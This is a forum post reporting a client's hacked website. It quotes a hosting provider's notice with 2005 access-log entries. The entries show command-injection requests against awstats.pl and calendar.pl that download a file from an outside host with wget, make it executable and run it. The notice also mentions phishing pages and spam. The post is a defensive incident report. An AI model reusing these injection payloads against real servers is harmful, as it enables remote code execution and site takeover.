I have a client running version 3.21. A few days ago his site was hacked. I'm copying the message here that he received from his hosting service. I have changed his site name to keep his anonymity and replaced various IPs with "IP". Matt -- if you need the complete information I can email it to you privately.
----------------------------
It has come to our attention that your web space has been hacked:
access.log.19.gz:IP - - [09/May/2005:14:56:58 -0400] "GET //cgi-bin/awstats.pl?configdir=|%20cd%20%2ftmp%3brm%20-f%20%2ftmp%2fc%3bwget%20128.192.30.20%2fc%3bchmod%20%2bx%20c%3b.%2fc%20IP%2080%20| HTTP/1.1" 404 1997IP "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "-"
access.log.21.gz:IP - - [29/May/2005:11:30:45 -0400] "GET /cgi-local/calendar/calendar.pl?command=login&fromTemplate=|cd%20/var/tmp;ls
;wget%20http://www.freewebs.com/soulerase/go;chmod%20750%20go;./go| HTTP/1.0" 200 194
http://www.thewebsite.com/ "-" "Mozilla/4.0 (compatible; MSIE
6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" "IP"
--
The above was taken from your access logs. It shows that awstats.pl and calendar.pl was used to perpetrate the hack.
The perpetrator setup a phishing site .signin.ebay.com/ and also was spamming from hisdirectory/.cgi-bin/webscr/.paypal/update.php.
-----------------------
Should I recommend he disable calendar until this can be resolved?
------------------
[This message has been edited by TrillionAdams (edited June 01, 2005).]
Everything Else
